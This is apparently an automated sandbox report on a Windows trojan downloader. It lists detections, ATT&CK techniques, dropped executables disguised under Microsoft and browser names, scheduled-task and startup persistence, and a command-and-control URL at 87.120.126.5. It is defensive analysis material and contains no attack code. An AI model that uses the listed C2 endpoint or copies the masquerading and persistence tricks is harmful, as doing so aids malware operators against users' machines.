                            Source: Yara matchFile source: 16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                            Windows Management Instrumentation                            		1
                            Scheduled Task/Job                            		11
                            Process Injection                            		1
                            Masquerading                            		OS Credential Dumping211
                            Security Software Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Command and Scripting Interpreter                            		2
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		1
                            Disable or Modify Tools                            		LSASS Memory151
                            Virtualization/Sandbox Evasion                            		Remote Desktop ProtocolData from Removable Media1
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		2
                            Registry Run Keys / Startup Folder                            		151
                            Virtualization/Sandbox Evasion                            		Security Account Manager1
                            Application Window Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                            DLL Side-Loading                            		11
                            Process Injection                            		NTDS1
                            File and Directory Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information                            		LSA Secrets123
                            System Information Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information                            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545318 Sample: 3u8A2xjbBT.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 62 Suricata IDS alerts for network traffic 2->62 64 Antivirus detection for dropped file 2->64 66 Antivirus / Scanner detection for submitted sample 2->66 68 9 other signatures 2->68 7 3u8A2xjbBT.exe 15 905 2->7         started        12 3u8A2xjbBT.exe 2->12         started        14 3u8A2xjbBT.exe 188 2->14         started        process3 dnsIp4 60 87.120.126.5, 49975, 49976, 49977 UNACS-AS-BG8000BurgasBG Bulgaria 7->60 52 C:\Users\user\...\windowspowershell.exe, PE32 7->52 dropped 54 C:\Users\user\OneDrive\windows sidebar.exe, PE32 7->54 dropped 56 C:\Users\...\windows portable devices.exe, PE32 7->56 dropped 58 36 other malicious files 7->58 dropped 70 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->70 72 Found strings related to Crypto-Mining 7->72 74 Uses cmd line tools excessively to alter registry or file data 7->74 76 2 other signatures 7->76 16 schtasks.exe 1 7->16         started        18 schtasks.exe 1 7->18         started        20 attrib.exe 7->20         started        30 9 other processes 7->30 22 schtasks.exe 12->22         started        32 7 other processes 12->32 24 schtasks.exe 14->24         started        26 attrib.exe 14->26         started        28 attrib.exe 14->28         started        file5 signatures6 process7 process8 34 conhost.exe 16->34         started        36 conhost.exe 18->36         started        38 conhost.exe 20->38         started        40 conhost.exe 22->40         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 9 other processes 30->48 50 7 other processes 32->50

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            3u8A2xjbBT.exe68%ReversingLabsWin32.Trojan.Strictor
                            3u8A2xjbBT.exe100%AviraDR/AVI.Agent.mrstb
                            3u8A2xjbBT.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\OneDrive\msbuild.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\mozilla maintenance service.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\jdownloader.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\msecache.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\google.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\windows mail.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\common files.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\java.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\windows defender.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft.net.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\reference assemblies.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft office.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\internet explorer.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\autoit3.exe100%AviraDR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\msbuild.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\mozilla maintenance service.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\jdownloader.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\msecache.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\google.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\windows mail.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\common files.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\java.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\windows defender.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft.net.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\reference assemblies.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft office.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\internet explorer.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\autoit3.exe100%Joe Sandbox ML
                            C:\Users\user\OneDrive\autoit3.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\common files.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\google.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\internet explorer.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\java.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\jdownloader.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft office.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft.net.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\mozilla maintenance service.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\msbuild.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\msecache.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\reference assemblies.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows defender.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows mail.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows media player.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows multimedia platform.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows nt.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows photo viewer.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows portable devices.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows sidebar.exe68%ReversingLabsWin32.Trojan.Strictor
                            C:\Users\user\OneDrive\windowspowershell.exe68%ReversingLabsWin32.Trojan.Strictor

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://87.120.126.5/VmCetSC7/page.phptrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://87.120.126.53u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003120000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://87.120.126.5/VmCetSC7/page.phpy3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://87.120.126.5/VmCetSC7/page.phpP3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    87.120.126.5
                                    		unknownBulgaria
                                    		25206UNACS-AS-BG8000BurgasBGtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545318
                                    Start date and time:2024-10-30 12:21:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 48s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:64
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:3u8A2xjbBT.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:8391d3b5332c4b1164333ddce388a8c7.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.mine.winEXE@72/47@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 85%
                                    • Number of executed functions: 456
                                    • Number of non-executed functions: 36
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: 3u8A2xjbBT.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    07:22:04API Interceptor9009766x Sleep call for process: 3u8A2xjbBT.exe modified
                                    13:50:52Task SchedulerRun new task: 3u8A2xjbBT path: C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    13:50:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    UNACS-AS-BG8000BurgasBGCARDFACTORYAccess Program, Tuesday, October 29, 2024.emlGet hashmaliciousHTMLPhisherBrowse
                                    • 87.120.113.115
                                    bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                    • 87.120.116.115
                                    Transferencia.docGet hashmaliciousQuasarBrowse
                                    • 87.120.116.115
                                    1XZFfxyWZA.exeGet hashmaliciousRedLineBrowse
                                    • 87.120.115.20
                                    roquette October.pdfGet hashmaliciousHTMLPhisherBrowse
                                    • 87.120.126.33
                                    roquette October.pdfGet hashmaliciousHTMLPhisherBrowse
                                    • 87.120.126.33
                                    https://anviict.com/?qvtvxymbGet hashmaliciousHTMLPhisherBrowse
                                    • 87.120.125.203
                                    t50.elfGet hashmaliciousXmrigBrowse
                                    • 87.120.117.189
                                    ctCDAy5OQc.exeGet hashmaliciousXenoRATBrowse
                                    • 87.120.116.115
                                    roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 87.120.112.102

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Oct 5 06:54:39 2023, mtime=Wed Oct 30 10:22:06 2024, atime=Wed Oct 30 10:22:02 2024, length=213832, window=hide
                                    Category:dropped
                                    Size (bytes):663
                                    Entropy (8bit):5.092925576386894
                                    Encrypted:false
                                    SSDEEP:12:8misM1qzYNbRLnALoQCUjAUFSCGRct1ESkXIl5v3r3zBmV:8mi1TnL6AiS9R017v3r3tm
                                    MD5:8761D28FA3DD17C7261A3FFCA6125C3B
                                    SHA1:6E4DE23D1FD6E109B2B71FD4B979EFA209F39F52
                                    SHA-256:967861420CDBA7EDCF1455316C05692A410A61F5EBEC9D909D1015A0026A812E
                                    SHA-512:1411416F58BF17CA2A9EE20CF65231BF3F29A687D6F8BAEFB1F27F0E2D224993E5D264B960BCD8C4CED32C6FC190D766A4E9597ED42DEE30A813CB3DF2591669
                                    Malicious:false
                                    Preview:L..................F.... ...l.91a...b$..*..+'..*..HC...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_......2a...'..Y.*....j.2.HC..^Y.Z .3U8A2X~1.EXE..N......EW.>^Y.Z.............................3.u.8.A.2.x.j.b.B.T...e.x.e.......X...............-.......W...........u.6......C:\Users\user\Desktop\3u8A2xjbBT.exe..+.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.u.8.A.2.x.j.b.B.T...e.x.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.`.......X.......114127...........hT..CrF.f4... .."......,......hT..CrF.f4... .."......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                    C:\Users\user\OneDrive\autoit3.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\autoit3.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\autoit3.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\common files.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\common files.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\common files.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\google.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
